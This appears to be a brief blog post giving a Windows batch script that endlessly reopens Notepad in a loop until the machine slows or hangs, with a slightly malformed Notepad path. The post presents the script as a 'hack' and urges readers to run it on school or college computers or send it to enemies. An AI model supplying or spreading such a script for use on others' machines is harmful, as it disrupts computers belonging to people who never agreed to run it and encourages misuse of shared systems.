A batch program to open the notepad file
continuously
continuously
Batch Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.
GOTO top
Open the Notepad and paste this code.
Save the file with .bat extension(for eg: notepadhack.bat).
Now double clicking the file will open the notepad continuously.
Try this in your college or school system.
Or send to your enemies.
No comments:
Post a Comment